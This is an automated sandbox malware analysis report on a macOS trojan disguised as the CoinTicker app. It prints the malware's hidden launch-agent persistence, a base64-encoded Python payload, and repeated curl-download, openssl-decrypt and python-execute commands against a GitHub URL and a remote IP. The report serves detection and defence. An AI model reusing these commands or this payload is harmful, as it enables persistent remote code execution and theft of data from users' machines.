Loading ...

Analysis Report xqnTwFKnuR

Overview

General Information

Joe Sandbox Version:24.0.0
Analysis ID:63329
Start date:02.11.2018
Start time:10:57:17
Joe Sandbox Product:Cloud
Overall analysis duration:0h 12m 54s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:xqnTwFKnuR (renamed file extension from none to app)
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal60.troj.spyw.macAPP@0/21@10/0

Detection

StrategyScoreRangeReportingDetection
Threshold600 - 100Report FP / FNmalicious

Classification

Signature Overview

Click to jump to signature section


Cryptography:

barindex
Decrypts dropped files with the "openssl" commandShow sources
Source: /bin/sh (PID: 712)Openssl decryption: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 724)Openssl decryption: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 729)Openssl decryption: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 734)Openssl decryption: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Executes the "openssl" command used for cryptographic operationsShow sources
Source: /bin/sh (PID: 712)Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 724)Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 729)Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 734)Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.0.50:49239 -> 185.206.144.226:1339
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 185.206.144.226
Source: unknownTCP traffic detected without corresponding DNS query: 17.188.165.205
Source: unknownTCP traffic detected without corresponding DNS query: 17.252.92.75
Source: unknownTCP traffic detected without corresponding DNS query: 17.252.92.75
Source: unknownTCP traffic detected without corresponding DNS query: 17.188.165.205
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /MFgwVqADAgEAME8wTTBLMAkGBSsOAwIaBQAEFH7maudymrP8%2BKIgZGwWoS1gcQhdBBSoSmpjBH3duubRObemRWXv86jsoQISBEPFo0kDZ%2BqvsHbeCoThsluI HTTP/1.1Host: ocsp.int-x3.letsencrypt.orgConnection: closeUser-Agent: trustd (unknown version) CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: github.com
Reads from file descriptors related to (network) socketsShow sources
Source: /usr/bin/curl (PID: 710)Reads from socket in process: dataJump to behavior
Source: /usr/bin/curl (PID: 723)Reads from socket in process: dataJump to behavior
Source: /usr/bin/curl (PID: 728)Reads from socket in process: dataJump to behavior
Source: /usr/bin/curl (PID: 733)Reads from socket in process: dataJump to behavior
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49249
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49248
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49246
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49245
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49242
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49241
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49240
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49251
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49250
Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49249 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 443
Writes from file descriptors related to (network) socketsShow sources
Source: /usr/bin/curl (PID: 710)Writes from socket in process: dataJump to behavior
Source: /usr/bin/curl (PID: 723)Writes from socket in process: dataJump to behavior
Source: /usr/bin/curl (PID: 728)Writes from socket in process: dataJump to behavior
Source: /usr/bin/curl (PID: 733)Writes from socket in process: dataJump to behavior

Spam, unwanted Advertisements and Ransom Demands:

barindex
Writes HTML files containing JavaScript to diskShow sources
Source: /usr/bin/curl (PID: 710)HTML file containing JavaScript created: /private/tmp/.info.enc
Source: /usr/bin/curl (PID: 723)HTML file containing JavaScript created: /private/tmp/.info.enc
Source: /usr/bin/curl (PID: 728)HTML file containing JavaScript created: /private/tmp/.info.enc
Source: /usr/bin/curl (PID: 733)HTML file containing JavaScript created: /private/tmp/.info.encJump to dropped file

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal60.troj.spyw.macAPP@0/21@10/0

Persistence and Installation Behavior:

barindex
Explicitly loads/starts launch services based on hidden plist filesShow sources
Source: /bin/bash (PID: 708)Hidden launch agent/daemon loaded: launchctl load /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Many shell processes execute programs via execve syscall (may be indicative of malicious behavior)Show sources
Source: /bin/sh (PID: 701)Shell process: /sbin/ifconfigJump to behavior
Source: /bin/sh (PID: 710)Shell process: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 712)Shell process: openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 713)Shell process: python /tmp/.info.pyJump to behavior
Source: /bin/sh (PID: 723)Shell process: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 724)Shell process: openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 725)Shell process: python /tmp/.info.pyJump to behavior
Source: /bin/sh (PID: 728)Shell process: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 729)Shell process: openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 730)Shell process: python /tmp/.info.pyJump to behavior
Source: /bin/sh (PID: 733)Shell process: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 734)Shell process: openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qqJump to behavior
Source: /bin/sh (PID: 735)Shell process: python /tmp/.info.pyJump to behavior
Creates hidden files, links and/or directoriesShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Hidden file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeWJump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Hidden file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Source: /usr/bin/curl (PID: 710)Hidden file created: /tmp/.info.encJump to behavior
Source: /usr/bin/openssl (PID: 712)Hidden file created: /tmp/.info.pyJump to behavior
Creates launch services that start periodicallyShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Launch agent/daemon created with StartInterval and/or StartCalendarInterval, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c echo IyAtKi0gY29kaW5nOiB1dGYtOCAtKi0KaW1wb3J0IHVybGxpYjIKZnJvbSBiYXNlNjQgaW1wb3J0IGI2NGVuY29kZSwgYjY0ZGVjb2RlCmltcG9ydCBnZXRwYXNzCmZyb20gdXVpZCBpbXBvcnQgZ2V0bm9kZQpmcm9tIGJpbmFzY2lpIGltcG9ydCBoZXhsaWZ5CgoKZGVmIGdldF91aWQoKToKICAgIHJldHVybiBoZXhsaWZ5KGdldHBhc3MuZ2V0dXNlcigpICsgIi0iICsgc3RyKGdldG5vZGUoKSkpCgoKdFlYWEZkVGp4UFFjdXJMID0gImtQMEJvZmJwQ084YnVlUSIKZGF0YSA9IHsKICAgICJDb29raWUiOiAic2Vzc2lvbj0iICsgYjY0ZW5jb2RlKGdldF91aWQoKSkgKyAiLWV5SjBlWEJsSWpvZ01Dd2dJbkJoZVd4dllXUmZiM0IwYVc5dWN5STZJSHNpYUc5emRDSTZJQ0l4T0RVdU1qQTJMakUwTkM0eU1qWWlMQ0FpY0c5eWRDSTZJREV6TXpsOUxDQWliRzloWkdWeVgyOXdkR2x2Ym5NaU9pQjdJbXh2WVdSbGNsOXVZVzFsSWpvZ0lteGhkVzVqYUY5a1lXVnRiMjRpTENBaWJHRjFibU5vWDJGblpXNTBYMjVoYldVaU9pQWlZMjl0TG1Gd2NHeGxMa1ZQUmtoWWNGRjJjV2h5SWl3Z0luQmhlV3h2WVdSZlptbHNaVzVoYldVaU9pQWljR3hSY1ZabVpVcDJSMjhpTENBaWNISnZaM0poYlY5a2FYSmxZM1J2Y25raU9pQWlmaTlNYVdKeVlYSjVMME52Ym5SaGFXNWxjbk12TGxWd1VWcGthR3RMWmtOa1UxbDRaeUo5ZlE9PSIsCiAgICAiVXNlci1BZ2VudCI6ICJNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xM18zKSBJump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c sleep 1 launchctl unload /Users/henry/Library/LaunchAgents/.espl.plist launchctl load /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c launchctl list | grep 'espl'Jump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c sw_versJump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c test -e /tmp/.info.py && echo 'Yes' || echo 'No'Jump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c test -e /tmp/.server.sh && echo 'Yes' || echo 'No'Jump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Shell command executed: /bin/bash -c test -e /Users/henry/Library/LaunchAgents/.espl.plist && echo 'Yes' || echo 'No'Jump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)Shell command executed: sh -c LC_ALL=C /sbin/ifconfig 2>/dev/nullJump to behavior
Source: /usr/bin/sh (PID: 709)Shell command executed: sh -c nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.pyJump to behavior
Source: /usr/bin/sh (PID: 722)Shell command executed: sh -c nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.pyJump to behavior
Source: /usr/bin/sh (PID: 727)Shell command executed: sh -c nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.pyJump to behavior
Source: /usr/bin/sh (PID: 732)Shell command executed: sh -c nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.pyJump to behavior
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)Show sources
Source: /usr/bin/nohup (PID: 710)Curl executable: /usr/bin/curl -> curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /usr/bin/nohup (PID: 723)Curl executable: /usr/bin/curl -> curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /usr/bin/nohup (PID: 728)Curl executable: /usr/bin/curl -> curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /usr/bin/nohup (PID: 733)Curl executable: /usr/bin/curl -> curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/bash (PID: 716)Grep executable: /usr/bin/grep -> grep esplJump to behavior
Executes the "nohup" (no hangup) command used to avoid background terminal process from being killedShow sources
Source: /bin/sh (PID: 710)Nohup executable: /usr/bin/nohup -> nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 723)Nohup executable: /usr/bin/nohup -> nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 728)Nohup executable: /usr/bin/nohup -> nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Source: /bin/sh (PID: 733)Nohup executable: /usr/bin/nohup -> nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.encJump to behavior
Executes the "python" command used to interpret Python scriptsShow sources
Source: /bin/bash (PID: 699)Python executable: /Library/Frameworks/Python.framework/Versions/2.7/bin/python -> pythonJump to behavior
Source: /bin/sh (PID: 713)Python executable: /usr/bin/python -> python /tmp/.info.pyJump to behavior
Source: /bin/sh (PID: 725)Python executable: /usr/bin/python -> python /tmp/.info.pyJump to behavior
Source: /bin/sh (PID: 730)Python executable: /usr/bin/python -> python /tmp/.info.pyJump to behavior
Source: /bin/sh (PID: 735)Python executable: /usr/bin/python -> python /tmp/.info.pyJump to behavior
Explicitly lists launch services possibly for searchingShow sources
Source: /bin/bash (PID: 715)Launch agent/daemon listed: launchctl listJump to behavior
Explicitly loads/starts launch servicesShow sources
Source: /bin/bash (PID: 708)Launch agent/daemon loaded: launchctl load /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Explicitly unloads, stops, and/or removes launch servicesShow sources
Source: /bin/bash (PID: 707)Launch agent/daemon unloaded: launchctl unload /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Keeps child processes alive after launchd jobs dieShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Launch agent/daemon created with AbandonProcessGroup, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Reads launchservices plist filesShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)Show sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plistJump to behavior
App bundle is code signedShow sources
Source: Submitted file: xqnTwFKnuR.appCodeResources XML file: CodeResources
Source: Submitted file: xqnTwFKnuR.appCodeResources XML file: CodeResources
Reads data from the local random generatorShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Random device file read: /dev/urandomJump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)Random device file read: /dev/urandomJump to behavior
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Uses the Python frameworkShow sources
Source: /Library/Frameworks/Python.framework/Versions/2.7/bin/python (PID: 699)Python framework application: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/python (PID: 713)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/python (PID: 725)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/python (PID: 730)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/python (PID: 735)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Writes property list (.plist) files to diskShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)XML plist file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeWJump to dropped file
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)XML plist file created: /Users/henry/Documents/coins.plistJump to dropped file

Boot Survival:

barindex
Creates memory-persistent launch servicesShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior
Creates user-wide 'launchd' managed services aka launch agentsShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Launch agent created file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW -> /Users/henry/Library/LaunchAgents/.espl.plistJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Executes the "base64" command used to encode or decode data (e.g. files, payloads)Show sources
Source: /bin/bash (PID: 698)Base64 executable: /usr/bin/base64 -> base64 --decodeJump to behavior

Malware Analysis System Evasion:

barindex
Executes the "sleep" command used to delay execution and potentially evade sandboxesShow sources
Source: /bin/bash (PID: 706)Sleep executable: /bin/sleep -> sleep 1Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Sysctl read request: kern.safeboot (1.66)Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries OS software version with shell command 'sw_vers'Show sources
Source: /bin/bash (PID: 718)sw_vers executed: sw_versJump to behavior
Reads hardware related sysctl valuesShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Sysctl read request: hw.availcpu (6.25)Jump to behavior
Reads the systems OS release and/or typeShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Reads the systems hostnameShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 696)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 700)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 705)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 714)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 718)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 719)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 720)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 721)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 709)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 722)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 727)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 732)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker (PID: 694)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 699)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/bin/sw_vers (PID: 718)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 713)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 713)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 725)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 725)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 730)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 730)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 735)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 735)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Stealing of Sensitive Information:

barindex
Executes the "ifconfig" command used to gather network informationShow sources
Source: /bin/sh (PID: 701)Ifconfig executable: /sbin/ifconfig -> /sbin/ifconfigJump to behavior


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 63329 Sample: xqnTwFKnuR Startdate: 02/11/2018 Architecture: MAC Score: 60 57 185.206.144.226, 1339 BELCLOUDBG Bulgaria 2->57 59 api.manana.kr 133.130.107.154, 443, 49242 INTERQGMOInternetIncJP Japan 2->59 61 12 other IPs or domains 2->61 10 xpcproxy CoinTicker 8 2->10         started        12 xpcproxy sh sh 2->12         started        14 xpcproxy sh sh 2->14         started        16 2 other processes 2->16 signatures3 63 Detected TCP or UDP traffic on non-standard ports 57->63 process4 process5 18 bash 10->18         started        29 6 other processes 10->29 20 sh openssl 1 12->20         started        31 2 other processes 12->31 23 sh openssl 14->23         started        33 2 other processes 14->33 25 sh openssl 16->25         started        27 sh openssl 16->27         started        35 4 other processes 16->35 signatures6 37 bash python Python 18->37         started        39 bash base64 18->39         started        41 bash 18->41         started        65 Decrypts dropped files with the "openssl" command 20->65 67 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 20->67 43 bash launchctl 29->43         started        46 bash launchctl 29->46         started        48 bash grep 29->48         started        50 2 other processes 29->50 process7 signatures8 52 sh 37->52         started        73 Explicitly loads/starts launch services based on hidden plist files 43->73 process9 process10 54 sh ifconfig 52->54         started        signatures11 69 Executes the "ifconfig" command used to gather network information 54->69 71 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 54->71

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

cam-macmac-stand

Startup

  • system is mac1
  • xpcproxy (PID: 694 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • CoinTicker (PID: 694 PPID: 1 Overlayed Process Image: xpcproxy MD5: 011fb781b08793ed1be8b1e9723c7ef2)
    • bash (PID: 696 PPID: 694 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • bash (PID: 697 PPID: 696 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • bash (PID: 698 PPID: 696 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • base64 (PID: 698 PPID: 696 Overlayed Process Image: bash MD5: 718fe34e4012999c180f807fe323e7f1)
      • bash (PID: 699 PPID: 696 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • python (PID: 699 PPID: 696 Overlayed Process Image: bash MD5: 8ec51a235078596c4b2e09b4db76e73b)
      • Python (PID: 699 PPID: 696 Overlayed Process Image: python MD5: 4d6dea37ae8536c5e20573905de9cf17)
        • sh (PID: 700 PPID: 699 MD5: 8aa60b22a5d30418a002b340989384dc)
          • sh (PID: 701 PPID: 700 MD5: 8aa60b22a5d30418a002b340989384dc)
          • ifconfig (PID: 701 PPID: 700 Overlayed Process Image: sh MD5: f81633f11f5fc0db70078b5ed1fedcec)
    • bash (PID: 705 PPID: 694 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • bash (PID: 706 PPID: 705 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • sleep (PID: 706 PPID: 705 Overlayed Process Image: bash MD5: cd4336ba78cb5b78f50d0f935036c332)
      • bash (PID: 707 PPID: 705 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • launchctl (PID: 707 PPID: 705 Overlayed Process Image: bash MD5: 17fad4b994d600d0a5b6bc02b55c2c80)
